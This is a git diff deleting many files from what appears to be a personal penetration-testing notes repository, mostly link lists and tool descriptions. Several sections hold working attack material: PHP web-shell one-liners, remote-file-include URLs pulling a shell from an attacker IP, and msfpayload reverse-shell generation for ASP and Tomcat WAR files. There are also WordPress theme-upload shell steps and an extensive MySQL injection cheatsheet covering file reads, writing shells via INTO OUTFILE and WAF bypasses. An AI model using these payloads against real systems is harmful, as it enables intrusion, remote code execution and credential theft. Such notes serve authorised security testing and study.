 [Windows 8 Security and ARM](http://2012.ruxconbreakpoint.com/assets/Uploads/bpx/alex-breakpoint2012.pdf)

 https://archive.org/details/HardwareStuffForSoftwarePeople


 http://opensecuritytraining.info/MalwareDynamicAnalysis_files/MalwareDynamicAnalysis02.pdf

 APK File Infection on an Android System - DEFCON 
 https://www.youtube.com/watch?v=HZI1hCdqKjQ&amp;list=PLCDA5DF85AD6B4ABD




 Unmasking Careto through Memory Analysis - Andrew Case
 http://2014.video.sector.ca/video/110388398


 http://www.slideshare.net/grecsl/malware-analysis-101-n00b-to-ninja-in-60-minutes-at-cactuscon-on-april-4-2014




 http://cs.gmu.edu/~astavrou/research/PyTrigger_ARES2013.pdf



 PortEX
 PortEx is a Java library for static malware analysis of Portable Executable files. Its focus is on PE malformation robustness, and anomaly detection. PortEx is written in Java and Scala, and targeted at Java applications.
 https://github.com/katjahahn/PortEx




 http://sniperforensicstoolkit.squarespace.com/malwaremanagementframework/


 https://en.wikibooks.org/wiki/Metasploit/Tips_and_Tricks


 http://www.myopenrouter.com/article/10917/Port-Mirroring-Span-Port-Monitor-Port-with-iptables-on-NETGEAR-WGR614L/

 http://netdude.sourceforge.net/

 Cull the interesting papers
 http://www.covert.io/




 http://www.harmj0y.net/blog/powershell/dumping-a-domains-worth-of-passwords-with-mimikatz-pt-2/


 [Android-x86 Project - Run Android on Your PC](http://www.android-x86.org/)
 * This is a project to port Android open source project to x86 platform, formerly known as "patch hosting for android x86 support". The original plan is to host different patches for android x86 support from open source community. A few months after we created the project, we found out that we could do much more than just hosting patches. So we decide to create our code base to provide support on different x86 platforms, and set up a git server to host it.

 Dare is a project which aims at enabling Android application analysis. The Dare tool retargets Android applications in .dex or .apk format to traditional .class files. These .class files can then be processed by existing Java tools, including decompilers. Thus, Android applications can be analyzed using a vast range of techiques developed for traditional Java applications. 

 http://siis.cse.psu.edu/
 http://c7zero.info/

 Lookat http://www.cl.cam.ac.uk/~sps32/PartII_030214.pdf

 Check under research section
 http://www.cl.cam.ac.uk/~sps32/


 
 Go through
 https://santoku-linux.com/howtos
 Compare resources against what power-view can grab
 Compare against sysmon service for scaling, setting it as service with scripting
 http://www.codeproject.com/Articles/36907/How-to-develop-your-own-Boot-Loader

 http://0xdabbad00.com/2013/09/02/file-scanner-web-app-part-1-of-5-stand-up-and-webserver/

 Shellshock bug writeup by lcamtuf
 http://lcamtuf.blogspot.com/2014/10/bash-bug-how-we-finally-cracked.html
 https://github.com/Veil-Framework/Veil-PowerView



 https://addons.mozilla.org/en-US/firefox/addon/ssleuth/




 [Access control best practices](https://srlabs.de/acs/)
--- a/Draft/Draft/Draft/Tor.md
+++ b/Draft/Draft/Draft/Tor.md
@ -1,15 +0,0 @@
 Tor








 Site list: (NO CP)
 http://belsec.skynetblogs.be/deepnet-the-tor-onion-directory-of-things-that-work-today.html


 Tor Search Engine
 https://ahmia.fi/address/skunksworkedp2cg
--- a/Draft/Draft/Draft/UX
+++ b/Draft/Draft/Draft/UX
@ -1,11 +0,0 @@








 [Nielsen Norman Group](http://www.nngroup.com)
 * Evidence-Based User Experience Research, Training, and Consulting
 * check articles and guidelines, ignore other sections
--- a/Draft/Draft/Draft/Various
+++ b/Draft/Draft/Draft/Various
@ -1,24 +0,0 @@
 Things I will not sort and only dump here

 Qubes

 Liberte

 Archassault

 Kali linux





 PenQ
 http://www.qburst.com/products/PenQ
 PenQ is an open source, Linux-based penetration testing browser bundle we built over Mozilla Firefox. It comes pre-configured with security tools for spidering, advanced web searching, fingerprinting, anonymous browsing, web server scanning, fuzzing, report generating and more.





 The ArchAssault Project is an Arch Linux derivative for penetration testers, security professionals and all-around Linux enthusiasts. This means we import the vast majority of the official upstream Arch Linux packages, these packages are unmodified from their upstream source. While our Arch Linux base is primarily untouched, there are times were we have to fork a package to be able to better support our vast selection of tools. All of our packages strive to maintain the Arch Linux standards, methods and philosophies.
 https://archassault.org/
--- a/Draft/Draft/Draft/Web
+++ b/Draft/Draft/Draft/Web
@ -1,36 +0,0 @@
 Add content for:


 BlindElephant


 Sparty
 https://github.com/alias1/sparty
 Audit Frontpage/Sharepoint sites

 Droopescan
 https://github.com/droope/droopescan
 A plugin-based scanner that aids security researchers in identifying issues with several CMSs, mainly Drupal & Silverstripe.



 CMS-Explorer

 XSS attack examples/ideas

 Github dorks - finding vulns
 http://blog.conviso.com.br/2013/06/github-hacking-for-fun-and-sensitive.html


 http://www.html5rocks.com/en/tutorials/security/content-security-policy/

 Arachni Web Scanner
 http://www.arachni-scanner.com/


 Prompt.ml - XSS challenges



 Intro to content Security Policy
 www.html5rocks.com/en/tutorials/security/content-security-policy/
--- a/Applications/Bypassing
+++ b/Applications/Bypassing
@ -1,3 +0,0 @@
 Bypassing WAFs

 http://www.nethemba.com/bypassing-waf.pdf
--- a/Draft/Draft/Draft/Web
+++ b/Draft/Draft/Draft/Web
@ -1,98 +0,0 @@
 Web Application exploitation - a cheatsheet By Tim Arneaud 
 If you want to get the full article, please go to the Source. 


 WebShell Backdoors
 Minimal php command shells 
 file cmd.php: PHP script text => 
 <?php system($_GET['cmd']) ?> 
 or 
 <?php system($_REQUEST['cmd']); ?> 
 Example usage via Remote File Include (RFI): 
 http://<target-ip>/index.php?cmd=<command to execute>&page=http://<attacker-ip>/cmd.php 
 Null Bytes () may also assist in some cases:
 http://<target-ip>/index.php?cmd=<command to execute>&page=http://<attacker-ip>/cmd.php 

 Encoding windows reverse command shell as asp 
 msfpayload windows/shell_reverse_tcp LHOST=<attacker-ip> LPORT=<attacker-nc-port> R | msfencode -t asp -o <filename>.asp 
 Encoding meterpreter in asp 
 msfpayload windows/meterpreter/reverse_tcp LHOST=<attacker-ip> LPORT=<attacker-multi-handler-port> R | msfencode -t asp -o <filename>.asp 
 ------ 
 attacker msfconsole: 
 use multi/exploit/handler 
 set payload windows/meterpreter/reverse_tcp 
 set LHOST <attacker-ip> 
 set LPORT <attacker-multi-handler-port> 
 exploit 

 Specific Web applications 
 Joomla 
 Joomla default database configuration filename 
 <web-app-path>/configuration.php 
 Scanning Joomla! for plugins and versions 
 /pentest/web/scanners/joomscan/joomscan.pl -u <target-and-joomla-path> 
 /pentest/enumeration/web/cms-explorer  -url <target-and-joomla-path> -type joomla 

 WordPress 
 WordPress  default database configuration filename
 <web-app-path> 
 WordPress default login page 
 <web-app-path> /wp-login.php
 WordPress plugins 
 <web-app-path> /wp-content/plugins
 Scanning WordPress for plugins and versions 
 /pentest/web/wpscan/wpscan.rb --url <target-and-wordpress-path&gt; -enumerate [u|p|v|t] 
 /pentest/enumeration/web/cms-explorer   -url <target-and-wordpress-path> -type wordpress
 Newer WP: "Themes" can be uploaded as zip files by WP administrators: 
 mkdir wpx 
 vi wpx/cmd.php 
 cat wpx/cmd.php 
 <?php system($_GET['cmd']) ?> 
 zip -r wpx.zip wpx 
 upload wpx.zip via web interface as an installed theme 
 Command execution access is via:  
 <web-app-path>/wp-content/plugins/wpx/cmd.php?cmd=<command(s)>  
 Older WP: Webshells can be added by editing exiting files/themes via the web interface or by enabling file upload and permitting the valid file extension (e.g. .php) 

 Cacti 
 Cacti default database configuration filename 
 <web-app-path> /include/config.php

 DeV!L`z ClanPortal 
 DeV!L`z ClanPortal default database configuration filename 
 <web-app-path> /inc/mysql.php

 Drupal 
 Drupal  default database configuration filename
 <web-app-path> /sites/default/settings.php


 Scanning WordPress for plugins and versions
 /pentest/enumeration/web/cms-explorer  -url <target-and-drupal-path> -type drupal


 Timeclock
 Timeclock default database configuration filename
 <web-app-path>/db.php
 
 SQL Terminators/Comments 
 MSSQL and MySQL: 
 <sql injected command>;-- 
 MySQL: 
 <sql injected command>;# 

 Login Pages Basic SQL injection  
 MS IIS 
 ' OR '1=1';-- 

 MySQL 
 'OR 1=1-- 

 SQLMap commands 
 cd /pentest/database/sqlmap 
 Retrieve SQL Banner, current database and current user; test if the user is the db administrator 
 ./sqlmap.py -u "http://<target>/index.php?param1=1&param2=2&param3=3" -p <injectable-parameter> --banner --current-db --current-user --is-dba 



 Source: http://it-ovid.blogspot.com/2012/04/web-application-exploitation-cheatsheet.html 
--- a/Draft/Draft/Draft/Web
+++ b/Draft/Draft/Draft/Web
@ -1,67 +0,0 @@
 [Go Buster](https://github.com/OJ/gobuster)
 * Directory/file busting tool written in Go 
 * Recursive, CLI-based, no java runtime


 [Relative Path Overwrite Explanation/Writeup](http://www.thespanner.co.uk/2014/03/21/rpo/)
 * RPO (Relative Path Overwrite) is a technique to take advantage of relative URLs by overwriting their target file. To understand the technique we must first look into the differences between relative and absolute URLs. An absolute URL is basically the full URL for a destination address including the protocol and domain name whereas a relative URL doesn’t specify a domain or protocol and uses the existing destination to determine the protocol and domain.


 [lan-js](https://github.com/jvennix-r7/lan-js)
 * Probe LAN devices from a web browser.



 [MozillaRecovery](https://github.com/gtfy/MozillaRecovery)
 * Recovers the master password of key3.db files, i.e. Thunderbird, Firefox


 [Javascript De-Obfuscation Tools Redux](http://www.kahusecurity.com/2014/javascript-deobfuscation-tools-redux/)
 * Back in 2011, I took a look at several tools used to deobfuscate Javascript. This time around I will use several popular automated and semi-automated/manual tools to see how they would fare against today’s obfuscated scripts with the least amount of intervention.




 Intro to Content Security Policy
 http://www.html5rocks.com/en/tutorials/security/content-security-policy/

 Securing Web Application Technologies Checklist
 http://www.securingthehuman.org/developer/swat

 Client Identification Mechanisms
 http://www.chromium.org/Home/chromium-security/client-identification-mechanisms



 RAWR - Rapid Assessment of Web Resources	
 https://bitbucket.org/al14s/rawr/wiki/Home

 COWL: A Confinement System for the Web
 robust JavaScript confinement system for modern web browsers. COWL introduces label-based mandatory access control to browsing contexts (pages, iframes, etc.) in a way that is fully backward-compatible with legacy web content. 
 http://cowl.ws/
 http://www.scs.stanford.edu/~deian/pubs/stefan:2014:protecting.pdf



 List of modules in Co2: https://code.google.com/p/burp-co2/wiki/Co2Modules
 Help page: http://co2.professionallyevil.com/help.php
 A collection of enhancements for Portswigger's popuplar Burp Suite web penetration testing tool. 
 https://code.google.com/p/burp-co2/
 Co2 includes several useful enhancements bundled into a single Java-based Burp Extension. The extension has it's own configuration tab with multiple sub-tabs (for each Co2 module). Modules that interact with other Burp tools can be disabled from within the Co2 configuration tab, so there is no need to disable the entire extension when using just part of the functionality. 



 OWASP Mantra
 http://www.getmantra.com/hackery/
 “OWASP Mantra is a powerful set of tools to make the attacker's task easier”








 Bradamsa
 https://github.com/ikkisoft/bradamsa
 Burp Suite extension to generate Intruder payloads using Radamsa 
--- a/Applications/Drupal.txt
+++ b/Applications/Drupal.txt
@ -1,54 +0,0 @@
 Drupal




 Check changelog file, sometimes they add things in/shows current version





 Gain Admin Access Drupal - has to have drush installed
 “cd  [drupal dir]”
 “drush uli”
 Copy/Paste URL, change password, bam! Admin.


 Applogging
 Watchdog - built in logging
 Syslog - Linux sys logging



 User Enumeration:
 No brute force protection on Version 6
 Noisy:
 Abuse Password reset feature, tells you valid user creds.
 Version 7 has brute force protection
 Check Default 

 Less Noisy:
 Check posts authors


 Drupal 6 doesn’t use httponly flag


 Files to look for:
 mysite/sites/default/settings.php - Creds

 Check to see:
 Masquerade plugin present - allows you to change user to any user.
 Devel Plugin present - Shows db info on ever page; allows for php code execution


 Drupal Attack Scripts:
 https://github.com/gfoss/attacking-drupal
 Set of brute force scripts and Checklist

 Drupal Security Checklist
 https://github.com/gfoss/attacking-drupal/blob/master/presentation/drupal-security-checklist.pdf



--- a/Draft/Draft/Draft/Web
+++ b/Draft/Draft/Draft/Web
@ -1,22 +0,0 @@
 Fix up

 Generating payload for Tomcat 
 msfpayload java/shell/reverse_tcp LHOST=192.168.1.6 W > colesec.war


 Tomcat does not have default creds however, when packaged up, it generally has creds similar across distributions.
 Use auxiliary/scanner/http/tomcat_mgr_login


 http://kaoticcreations.blogspot.com/2012/11/hacking-cold-fusion-servers-part-i.html



 Code Injection:
 https://www.owasp.org/index.php/Code_Injection
 Code Injection is the general term for attack types which consist of injecting code that is then interpreted/executed by the application. This type of attack exploits poor handling of untrusted data. These types of attacks are usually made possible due to a lack of proper input/output data validation, for example: 
 allowed characters (standard regular expressions classes or custom) 
 data format 
 amount of expected data 
 Code Injection differs from Command Injection in that an attacker is only limited by the functionality of the injected language itself. If an attacker is able to inject PHP code into an application and have it executed, he is only limited by what PHP is capable of. Command injection consists of leveraging existing code to execute commands, usually within the context of a shell. 
 ; ls
--- a/Applications/HTML5.txt
+++ b/Applications/HTML5.txt
@ -1,14 +0,0 @@
 HTML 5





 SH5ARK
 From: http://sh5ark.professionallyevil.com/	
 The Securing HTML5 Assessment Resource Kit, or SH5ARK, is an open source project that provides a repository of HTML5 features, proof-of-concept attack code, and filtering rules. The purpose of this project is to provide a single repository that can be used to collect sample code of vulnerable HTML5 features, actual attack code, and filtering rules to help prevent attacks and abuse of these features. The intent of the project is to bring awareness to the opportunities that HTML5 is providing for attackers, to help identify these attacks, and provide measures for preventing them

 Presentation on SH5ARK
 https://www.youtube.com/watch?v=1ZZ-vIwmWx4

 GetSH5ARK here: http://sourceforge.net/projects/sh5ark/
--- a/Applications/Joomla.txt
+++ b/Applications/Joomla.txt
@ -1,40 +0,0 @@
 Joomla




 Joomscan - hasn’t been updated since 2012, still nice.


 Application Level Logging
 Flat file logging - Jlog




 Files to look for:

 mysite/configuration.php - Config file




 User Enumeration:
 Noisy:
 Abuse Password reset feature, tells you valid user creds.
 Can be brute forced through scripting, but slow

 Less Noisy:
 Check posts authors
 Check user #s











--- a/Draft/Draft/Draft/Web
+++ b/Draft/Draft/Draft/Web
@ -1,30 +0,0 @@






 LFI Local File Inclusion Techniques (paper)

 From: http://www.ush.it/2008/08/18/lfi2rce-local-file-inclusion-to-remote-code-execution-advanced-exploitation-proc-shortcuts/

 This paper exposes the ability from the attacker standpoint to use /proc in order to exploit LFI (Local File Inclusion) vulnerabilities. While using /proc for such aim is well known this one is a specific technique that was not been previously published as far as we know. A tool to automatically exploit LFI using the shown approach is released accordingly. 
 Update: a third (known) technique has been dissected here:
 http://www_ush_it/2008/07/09/local-file-inclusion-lfi-of-session-files-to-root-escalation/ 


 Liffy (tool)
 From: https://github.com/rotlogix/liffy
 Liffy is a Local File Inclusion Exploitation tool. 
 Current features include: 
 data:// for code execution
 expect:// for code execution
 input:// for code execution
 filter:// for arbitrary file reads
 /proc/self/environ for code execution in CGI mode
 Apache access.log poisoning
 Linux auth.log SSH poisoning
 Direct payload delivery with no stager
 Support for absolute and relative paths 
 Support for cookies
 ! I have had issues with access log poisoning on current versions of Apache. This not an issue with the payload delivery and or poisoning. This is more of an issue with the request after the poisoning to kick off your shell. This may require a browser refresh. !
--- a/Applications/Meta.rtf
+++ b/Applications/Meta.rtf
--- a/Draft/Draft/Draft/Web
+++ b/Draft/Draft/Draft/Web
@ -1,43 +0,0 @@
 NO/SQL Injection





 SQL Injection Cheat Sheet
 http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/

 SQL Injection Knowledge Base
 http://websec.ca/kb/sql_injection#MySQL_Testing_Injection


 Laduanum
 	Taken from: http://laudanum.sourceforge.net/
 “Laudanum is a collection of injectable files, designed to be used in a pentest when SQL injection flaws are found and are in multiple languages for different environments.They provide functionality such as shell, DNS query, LDAP retrieval and others.”


 Pen Testing MongoDB
 http://www.irongeek.com/i.php?page=videos/derbycon4/t408-making-mongo-cry-attacking-nosql-for-pen-testers-russell-butturini




 SQLi Lab lessons
 From: https://github.com/Audi-1/sqli-labs
 SQLI-LABS is a platform to learn SQLI Following labs are covered for GET and POST scenarios: 
 Error Based Injections (Union Select) 
 String
 Intiger
 Error Based Injections (Double Injection Based)
 BLIND Injections: 1.Boolian Based 2.Time Based
 Update Query Injection.
 Insert Query Injections.
 Header Injections. 1.Referer based. 2.UserAgent based. 3.Cookie based.
 Second Order Injections
 Bypassing WAF 
 Bypassing Blacklist filters Stripping comments Stripping OR & AND Stripping SPACES and COMMENTS Stripping UNION & SELECT
 Impidence mismatch
 Bypass addslashes()
 Bypassing mysql_real_escape_string. (under special conditions)
 Stacked SQL injections.
 Secondary channel extraction
--- a/Draft/Draft/Draft/Web
+++ b/Draft/Draft/Draft/Web
@ -1 +0,0 @@
 
--- a/Applications/Securing
+++ b/Applications/Securing
@ -1,39 +0,0 @@
 Securing Web Applications










 Center for Internet Security Apache Server 2.4 Hardening Guide:
 https://benchmarks.cisecurity.org/tools2/apache/CIS_Apache_HTTP_Server_2.4_Benchmark_v1.1.0.pdf


 Magical Code Injection Rainbow Framework
 The Magical Code Injection Rainbow! MCIR is a framework for building configurable vulnerability testbeds. MCIR is also a collection of configurable vulnerability testbeds. 
 From: https://github.com/SpiderLabs/MCIR
 Has testing lessons for xss/csrf/sql


 Source Code Analysis

 RIPS
 From: http://rips-scanner.sourceforge.net/
 RIPS is a tool written in PHP to find vulnerabilities in PHP applications using static code analysis. By tokenizing and parsing all source code files RIPS is able to transform PHP source code into a program model and to detect sensitive sinks (potentially vulnerable functions) that can be tainted by user input (influenced by a malicious user) during the program flow. Besides the structured output of found vulnerabilities RIPS also offers an integrated code audit framework for further manual analysis. 













--- a/Applications/Tools/Brute
+++ b/Applications/Tools/Brute
@ -1,28 +0,0 @@
 Brute Force Tools


 WFuzz
 Wfuzz is a tool designed for bruteforcing Web Applications, it can be used for finding resources not linked (directories, servlets, scripts, etc), bruteforce GET and POST parameters for checking different kind of injections (SQL, XSS, LDAP,etc), bruteforce Forms parameters (User/Password), Fuzzing,etc. 

 https://code.google.com/p/wfuzz/

 It's very flexible, here are some functionalities: 
 Multiple Injection points capability with multiple dictionaries 
 Recursion (When doing directory bruteforce) 
 Post, headers and authentication data brute forcing 
 Output to HTML 
 Colored output 
 Hide results by return code, word numbers, line numbers, regex. 
 Cookies fuzzing 
 Multi threading 
 Proxy support 
 SOCK support 
 Time delays between requests 
 Authentication support (NTLM, Basic) 
 All parameters bruteforcing (POST and GET) 
 Multiple encoders per payload 
 Payload combinations with iterators 
 Baseline request (to filter results against) 
 Brute force HTTP methods 
 Multiple proxy support (each request through a different proxy) 
 HEAD scan (faster for resource discovery) 
--- a/Applications/Tools/JS
+++ b/Applications/Tools/JS
@ -1,6 +0,0 @@
 Unphp.net php decoder
 http://www.unphp.net/decode/


 http://ddecode.com/phpdecoder/

--- a/Applications/Tools/Meta.txt
+++ b/Applications/Tools/Meta.txt
@ -1,13 +0,0 @@
 Meta









 OWASP Mantra
 http://www.getmantra.com/hackery/
 “OWASP Mantra is a powerful set of tools to make the attacker's task easier”
--- a/Applications/Tools/SQL
+++ b/Applications/Tools/SQL
--- a/Applications/Tools/Scanners.txt
+++ b/Applications/Tools/Scanners.txt
@ -1,21 +0,0 @@
 Nikto:

 WPScan:
 http://wpscan.org/

 JoomScan: https://www.owasp.org/index.php/Category:OWASP_Joomla_Vulnerability_Scanner_Project
 Joomla! is probably the most widely-used CMS out there due to its flexibility, user-friendlinesss, extensibility to name a few.So, watching its vulnerabilities and adding such vulnerabilities as KB to Joomla scanner takes ongoing activity.It will help web developers and web masters to help identify possible security weaknesses on their deployed Joomla! sites. No web security scanner is dedicated only one CMS. 


 CMSExplorer: https://code.google.com/p/cms-explorer/
 CMS Explorer is designed to reveal the the specific modules, plugins, components and themes that various CMS driven web sites are running. 
 Additionally, CMS Explorer can be used to aid in security testing. While it performs no direct security checks, the "explore" option can be used to reveal hidden/library files which are not typically accessed by web clients but are nonetheless accessible. This is done by retrieving the module's current source tree and then requesting those file names from the target system. These requests can be sent through a distinct proxy to help "bootstrap" security testing tools like Burp, Paros, Webinspect, etc. 
 CMS Explorer can also search OSVDB for vulnerabilities with the installed components. 
 CMS Explorer currently supports module/theme discovery with the following products: 
 Drupal 
 Wordpress 
 Joomla! 
 Mambo 
 And exploration of the following products: 
 Drupal 
 Wordpress 
--- a/Applications/Tools/Tools.rtf
+++ b/Applications/Tools/Tools.rtf
--- a/Applications/Tools/WebShells.txt
+++ b/Applications/Tools/WebShells.txt
@ -1,22 +0,0 @@
 WebShells


 Weevely



 B374k Shell
 https://github.com/b374k/b374k
 File manager (view, edit, rename, delete, upload, download, archiver, etc)
 Search file, file content, folder (also using regex)
 Command execution
 Script execution (php, perl, python, ruby, java, node.js, c)
 Give you shell via bind/reverse shell connect
 Simple packet crafter
 Connect to DBMS (mysql, mssql, oracle, sqlite, postgresql, and many more using ODBC or PDO)
 SQL Explorer
 Process list/Task manager
 Send mail with attachment (you can attach local file on server)
 String conversion
 All of that only in 1 file, no installation needed
 Support PHP > 4.3.3 and PHP 5
--- a/Draft/Draft/Draft/Web
+++ b/Draft/Draft/Draft/Web
--- a/Applications/Wordpress.txt
+++ b/Applications/Wordpress.txt
@ -1,32 +0,0 @@
 Wordpress


 WPScan - Awesomesauce. Updated.
 Www.wpscan.org


 App level loggging
 WP Security Audit log - Plugin


 Files to look for:


 mysite/wp-config.php - Creds infile



 User Enumeration:
 Noisy:
 Abuse Password reset feature, tells you valid user creds.
 Can be brute forced

 Less Noisy:
 Check posts authors







--- a/Draft/Draft/Draft/Web
+++ b/Draft/Draft/Draft/Web
@ -1,111 +0,0 @@
 CheatSheet: SQL Injection
 Comments
 /* – Multi line comment.
 # – single line comment.
 -- – single line comment.
 /*!*/ – Mysql special comments.
 Whitespaces.
 +, %2B, %20, %09, %0d ,%0?, /**/, /*foo*/
 Global system variables
@@datadir  // Mysql data directory.
@@version_compile_os -  //OS Mysql is running on.
@@version – //Mysql database version.
 user() – //Current database user.
@@log_error – //Path to error log.
 database() – //Current database.

 The INFORMATION_SCHEMA database is made up of the following objects:

 SCHEMATA
 TABLES
 COLUMNS
 STATISTICS
 USER_PRIVILEGES
 SCHEMA_PRIVILEGES
 TABLE_PRIVILEGES
 COLUMN_PRIVILEGES
 CHARACTER_SETS
 COLLATIONS
 COLLATION_CHARACTER_SET_APPLICABILITY
 TABLE_CONSTRAINTS
 KEY_COLUMN_USAGE
 ROUTINES
 VIEWS
 TRIGGERS
 PROFILING

 

 Columns in a SELECT.
 file.php?var=1 order by 10--      //Unknown column ’10' in ‘order clause’
 file.php?var=1 and(select * from table)=(1)--   //Operand should contain 9 column(s)
 Encoding. //For matching collations.
 file.php?var=1 union select cast(version() as latin1)--  //5.0.11
 file.php?var=1 union select convert(version() as binary)-- //5.0.11
 file.php?var=1 union select aes_decrypt(aes_encrypt(version(),1),1)-- //5.0.11
 file.php?var=1 union select unhex(hex(versions()))-- //5.0.11
 File_priv.
 file.php?var=1 union select user()-- //Checking current user. root@localhost
 file.php?var=1 union select file_priv from mysql.user where user=’root’--  //Checking for the file priveledge on current user, Y =Yes N=No.
 file.php?var=1 union select load_file(‘/etc/passwd’)--  // Loading system files.
 file.php?var=1 and+(select+1+from+(select+count(0),concat((select+load_file(‘/etc/passwd’),floor(rand(0)*2))+from+information_schema.tables+group+by+2+limit+1)a)--  // Loading system files with error based injection.
 file.php?var=1 union select “<?php system($_GET[c]);?>” into outfile ‘/dir/dir/shell.php’--  // Write code to a file.
 file.php?var=1 limit 1 into outfile ‘/dir/dir/shell.php’ lines terminated by “<?php system($_GET[c]);?>”--+  //Write to a file.
 WAF & security bypasses.
 file.php?var=1 /*!union*/ /*select*/ version()-- //MySQL comments.
 file.php?var=1 unUNIONion seleSELECTct version()-- //Filter bypass
 file.php?var=1/**/union/**/select/**/version()--  //Whitespace bypass
 file.php?var=1 UnION SElecT version()--  //Mixed upper/lower
 file.php?var=1 uni/**/on sel/**/ect version()-- //php comments.
 file.php?var=1 uni%6Fn select version()-- //URL encoding.
 file.php?var=1 %252f%252a*/union%252f%252a /select%252f%252a*/1,2,3%252f%252a*/from%252f%252a*/users--  //Taking advantage of a WAF that only decodes input once.
 file.php?var=1 0×414141414141414141414141414141414141 union select version()--  //Buffer overflow.
 file.php?var=1 union select 0x3a3a3a--  //Encode to bypass magic quotes.
 Extracting data from MySQL errors.
 Rand()
 file.php?var=1 and(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)--
 file.php?var=1 or (select count(*)from(select 1 union select 2 union select 3)x group by concat(mid((select version() from information_schema.tables limit 1),1,64),floor(rand(0)*2)))--
 file.php?var=1 and row(1,1)>(select count(*),concat(version(),0x3a,floor(rand(0)*2)) x from (select 1 union select 2)a group by x limit 1) --
 file.php?var=1 or (select count(*) from table group by concat(version(),floor(rand(0)*2)))--
 file.php?var=1 union select password from users where id=1 and row(1,1)>(select count(*),concat( (select users.password) ,0x3a,floor(rand()*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) --
 Name_const(Mysql 5.0.12 > 5.0.64)
 file.php?var=1 or(1,2)=(select * from(select name_const(version(),1),name_const(version(),1))a)--
 Extractvalue & updatexml (MySQL 5.1+)
 file.php?var=1 and extractvalue(rand(),concat(0x3a,version()))--  //Xpath error
 file.php?var=1 and updatexml(rand(),concat(0x3a,version()))-- //Xpath error
 Misc.
 file.php?var=(@:=1)or@ group by concat(@@version,@:=!@)having@||min(0)-- //Credits BlackFan.
 file.php?var=(@:=9)or@ group by left(@@version,@:=~@)having@||min(0)-- //Credits Blackfan.
 file.php?var=1 UNION SELECT * FROM (SELECT version() FROM information_schema.tables JOIN information_schema.tables b)a--
 Injecting into an order byfile.php?var=(select if(substring(version(),1,1)=4,1,(select 1 union select 2)))--
 file.php?var=1,ExtractValue(1,concat(0x5c,(sele ct table_name from information_schema.tables limit 1)))--
 Blind.
 file.php?var=1 and IF(ASCII(SUBSTRING((SELECT version()),1,1)))>=100,1, BENCHMARK(2000000,MD5(NOW())))-- //time based BSQLi
 file.php?var=1 and IF(ASCII(SUBSTRING((SELECT USER()), 1, 1)))>=100, 1, SLEEP(3))-- //Time based BSQLi
 file.php?var=1 AND (SELECT @a:=MID(BIN(FIND_IN_SET(MID(table_name,1,1), ‘a,b,c,d,e,f
 ,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,0,1,2,3,4,5,6,7,8,9,_,!,@,#,
 $,%,^,&,*,(,),-,+,=,\,,.,”,\’,~,`,\\,|,{,},[,],:,;, ,’)),1,1) FROM in
 formation_schema.tables LIMIT 1)=@a AND IF(@a!=”,@a,SLEEP(5))--
 If Statement SQL Injection Attack Samples
 SELECT IF(user()='root@localhost','true','false') 
 Load File
 ' UNION ALL SELECT LOAD_FILE('/etc/passwd') --
 Create User
 CREATE USER username IDENTIFIED BY 'password'; --
 Drop User
 DROP USER username; -- 
 Make user to DBA
 GRANT ALL PRIVILEGES ON *.* TO username@'%'; 
 List Users

    SELECT * FROM 'user' WHERE 1 LIMIT 0,30
    SELECT * FROM mysql.user WHERE 1 LIMIT 1,1
    SELECT * FROM mysql.user

 Getting user defined tables SELECT table_name FROM information_schema.tables WHERE table_schema = 'tblUsers'
 Getting Column NamesSELECT table_name, column_name FROM information_schema.columns WHERE table_schema = 'tblUsers’tblUsers -> tablename
 SELECT table_schema, table_name FROM information_schema.columns WHERE column_name = 'username';
 find table which have a column called 'username'
 String without Quotes
 SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77))
 This will return ‘KLM’.
--- a/Draft/Draft/Draft/Wireless
+++ b/Draft/Draft/Draft/Wireless
@ -1,165 +0,0 @@
 Wireless Networks


 CULL

 http://www.irongeek.com/i.php?page=videos/defcon-wireless-village-2014/17-phys-macs-and-sdrs-robert-ghilduta


 Bluetooth NSA toolset talk/attacks vid
 http://www.irongeek.com/i.php?page=videos/defcon-wireless-village-2014/15-the-nsa-playset-bluetooth-smart-attack-tools-mike-ryan



 [WPA/WPA2 Dictionaries](https://wifi0wn.wordpress.com/wepwpawpa2-cracking-dictionary/)


 Ubertooth


 Github.com/mikeryan/crackle

 Scapy


 Bluez.org

 PyBT


 [Infernal-Twin](https://github.com/entropy1337/infernal-twin)
 * This is the tool created to automate Evil Twin attack and capturing public and guest credentials of Access Point

 [SS7: Locate. Track. Manipulate. You have a tracking device in your pocket](http://media.ccc.de/browse/congress/2014/31c3_-_6249_-_en_-_saal_1_-_201412271715_-_ss7_locate_track_manipulate_-_tobias_engel.html#video&t=424)
 * Companies are now selling the ability to track your phone number whereever you go. With a precision of up to 50 meters, detailed movement profiles can be compiled by somebody from the other side of the world without you ever knowing about it. But that is just the tip of the iceberg. 








 Fox Hunting & Wardriving

 [Practical Foxhunting 101](http://www.irongeek.com/i.php?page=videos/defcon-wireless-village-2014/04-practical-foxhunting-101-simonj)


 Wireless Reconnaissance

 Tools:

 iSniff
 Description: iSniff GPS passively sniffs for SSID probes, ARPs and MDNS (Bonjour) packets broadcast by nearby iPhones, iPads and other wireless devices. The aim is to collect data which can be used to identify each device and determine previous geographical locations, based solely on information each device discloses about previously joined WiFi networks.  
 iOS devices transmit ARPs which sometimes contain MAC addresses (BSSIDs) of previously joined WiFi networks, as described in [1]. iSniff GPS captures these ARPs and submits MAC addresses to Apple's WiFi location service (masquerading as an iOS device) to obtain GPS coordinates for a given BSSID. If only SSID probes have been captured for a particular device, iSniff GPS can query network names on wigle.net and visualise possible locations.
 Link: https://github.com/hubert3/iSniff-GPS




 Guide to setting up/doing wifi attacks
 http://securitysynapse.blogspot.com/2013/12/wireless-pentesting-on-cheap-kali-tl.html
 this article, we proved the capabilities of an inexpensive wireless adapter and a flexible virtualized wireless attack image by breaking into a WEP protected test network.  For just $16 


 Piece to purchase: http://www.newegg.com/Product/Product.aspx?Item=N82E16833704045




 802.11


 Karma
 http://www.theta44.org/karma/





 RFID - Radio Frequency Identification


 ravenhid
 Hardware and software to run a RFID reader to harvest card information. This is the PCB design and Arduino code that will run a RFID reader, allowing you to gather and harvest cards. Typically, a larger reader, such as those in garages, will be more successful, allowing you to ready over a couple feet instead of inches. The board itself is designed to be modular and support multiple methods to output harvested cards once they are read: 
 Text file on a MicroSD card
 Print out to LCD
 Bluetooth Low Energy Arduino serial connection 
